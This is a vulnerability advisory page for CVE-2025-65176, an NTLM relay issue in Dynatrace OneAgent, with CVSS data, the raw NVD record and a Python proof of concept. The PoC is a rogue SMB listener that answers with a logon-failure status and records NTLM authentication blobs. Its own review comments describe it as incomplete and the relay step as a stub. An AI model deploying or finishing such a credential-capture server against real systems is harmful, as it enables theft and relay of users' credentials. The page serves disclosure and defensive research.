Security Vulnerability Report
CVE-2025-65176 CVSS 7.5 HIGH

CVE-2025-65176

Published: 2025-12-15 19:16:05
Last Modified: 2026-01-07 20:46:22

Description

An issue was discovered in Dynatrace OneAgent before 1.325.47. When attempting to access a remote network share from a machine where OneAgent is installed and receiving a "STATUS_LOGON_FAILURE" error, the agent will retrieve every user token on the machine and repeatedly attempt to access the network share while impersonating them. The exploitation of this vulnerability can allow an unprivileged attacker with access to the affected system to perform NTLM relay attacks.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Note: this vector comes from the "Secondary" metric source in the raw record below and rates the issue as network-reachable with no privileges (AV:N/PR:N), whereas the description states that exploitation requires an unprivileged attacker who already has access to the affected system. Read the exploitability sub-metrics with that discrepancy in mind; the confidentiality impact (credential exposure via NTLM relay) is the substantive part of the rating.

Configurations (Affected Products)

cpe:2.3:a:dynatrace:oneagent:*:*:*:*:*:*:*:* - VULNERABLE
Dynatrace OneAgent < 1.325.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
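# CVE-2025-65176 NTLM Relay Attack PoC
# This PoC demonstrates the NTLM relay vulnerability in Dynatrace OneAgent
# Attack Scenario: Setup a rogue SMB server to capture Net-NTLM hashes
#
# NOTE(review): this listener only illustrates the trigger condition. It does
# not implement the SMB2 NEGOTIATE / SESSION_SETUP exchange and never sends an
# NTLMSSP CHALLENGE, so a real SMB client is unlikely to interpret its reply as
# STATUS_LOGON_FAILURE, and nothing it records is usable for offline cracking
# or live relay. Use a complete SMB server implementation for actual testing.
import socket
import threading
import hashlib
import binascii
import struct

# NTSTATUS value sent on the wire in little-endian order. The original PoC
# emitted 0xC0000034, which is STATUS_OBJECT_NAME_NOT_FOUND, not a logon failure.
STATUS_LOGON_FAILURE = 0xC000006D

# NTLMSSP framing: 8-byte signature followed by a little-endian MessageType.
NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLMSSP_NEGOTIATE = 1
NTLMSSP_CHALLENGE = 2
NTLMSSP_AUTHENTICATE = 3


class RogueSMBServer:
    """Minimal TCP listener on the SMB port that records NTLMSSP AUTHENTICATE blobs.

    Attributes:
        host: interface to bind.
        port: TCP port to bind (445 normally needs elevated privileges).
        captured_hashes: raw NTLMSSP AUTHENTICATE messages recorded so far.
    """

    def __init__(self, host='0.0.0.0', port=445):
        self.host = host
        self.port = port
        self.captured_hashes = []

    def start(self):
        """Accept connections forever, serving each one on a daemon thread.

        Blocks the calling thread. The listening socket is released by the
        ``with`` block when the loop is interrupted (e.g. KeyboardInterrupt).
        """
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:
            server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            server_socket.bind((self.host, self.port))
            server_socket.listen(5)
            print(f"[*] Rogue SMB Server started on {self.host}:{self.port}")
            print("[*] Waiting for Dynatrace OneAgent connection...")
            while True:
                client_socket, addr = server_socket.accept()
                print(f"[+] Connection received from: {addr}")
                # daemon threads so that stopping the accept loop ends the process
                threading.Thread(
                    target=self.handle_client, args=(client_socket,), daemon=True
                ).start()

    def handle_client(self, client_socket):
        """Serve one client: answer the first SMB request, then record one read.

        The client socket is always closed, including on socket errors, which
        are logged rather than silently swallowed.
        """
        with client_socket:
            try:
                data = client_socket.recv(1024)
                if b"SMB" in data:
                    print("[*] SMB Negotiation Request received")
                    # Per the advisory, a STATUS_LOGON_FAILURE reply is the
                    # condition under which OneAgent retries the share while
                    # impersonating every user token on the host.
                    client_socket.send(self.build_smb_response())
                    print("[+] Sent malicious response to trigger token enumeration")
                auth_data = client_socket.recv(4096)
            except OSError as exc:
                print(f"[-] Socket error while handling client: {exc}")
                return
            if auth_data:
                print("[+] Captured NTLM authentication data")
                self.extract_ntlm_hash(auth_data)

    def build_smb_response(self):
        """Return the 8-byte stub reply: four zero bytes + STATUS_LOGON_FAILURE.

        NOTE(review): this is not a NetBIOS-framed SMB2 header; it only carries
        the NTSTATUS the PoC is about, packed little-endian as on the wire.
        """
        smb_header = b"\x00\x00\x00\x00"
        error_status = struct.pack("<I", STATUS_LOGON_FAILURE)
        return smb_header + error_status

    def extract_ntlm_hash(self, data):
        """Record the NTLMSSP AUTHENTICATE message contained in ``data``, if any.

        Args:
            data: raw bytes read from the client.

        Returns:
            The recorded message bytes (from the NTLMSSP signature to the end
            of ``data``), or None when no NTLMSSP message is present, the
            message is truncated, or it is a NEGOTIATE/CHALLENGE -- those carry
            no credential material and must not be counted as captures.
        """
        ntlm_offset = data.find(NTLMSSP_SIGNATURE)
        if ntlm_offset < 0 or len(data) < ntlm_offset + 12:
            return None
        (message_type,) = struct.unpack_from("<I", data, ntlm_offset + 8)
        if message_type != NTLMSSP_AUTHENTICATE:
            print(f"[*] NTLMSSP message type {message_type} ignored (not AUTHENTICATE)")
            return None
        # Keep the whole message: NTLMv2 AUTHENTICATE blobs are variable length
        # and commonly exceed the fixed 256 bytes the original PoC sliced off.
        ntlm_data = data[ntlm_offset:]
        print(f"[+] NTLM Data captured: {ntlm_data[:32].hex()}")
        self.captured_hashes.append(ntlm_data)
        print(f"[*] Total hashes captured: {len(self.captured_hashes)}")
        return ntlm_data


def relay_attack(target_server, captured_hash):
    """Placeholder for the relay step; intentionally not implemented.

    NOTE(review): NTLM relay has to happen live, inside the victim client's
    authentication exchange -- an AUTHENTICATE message is bound to the server
    challenge, so a previously recorded blob cannot simply be replayed against
    ``target_server`` later. Targets named by the original PoC: Exchange, ADCS,
    SMB servers.
    """
    print(f"[*] Relaying hash to target: {target_server}")


if __name__ == "__main__":
    server = RogueSMBServer(host='0.0.0.0', port=445)
    server.start()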

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65176", "sourceIdentifier": "[email protected]", "published": "2025-12-15T19:16:05.097", "lastModified": "2026-01-07T20:46:22.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Dynatrace OneAgent before 1.325.47. When attempting to access a remote network share from a machine where OneAgent is installed and receiving a \"STATUS_LOGON_FAILURE\" error, the agent will retrieve every user token on the machine and repeatedly attempt to access the network share while impersonating them. The exploitation of this vulnerability can allow an unprivileged attacker with access to the affected system to perform NTLM relay attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dynatrace:oneagent:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.325.47", "matchCriteriaId": "595B1C6A-7C56-47BD-9595-0AE82ED8AACD"}]}]}], "references": [{"url": "https://docs.dynatrace.com/docs/shortlink/release-notes-oneagent-sprint-325#oneagent-sprint-325-ga", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.dynatrace.com/docs/whats-new/oneagent/sprint-325#oneagent-sprint-325-ga", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": 
"https://hackerone.com/reports/3313408", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}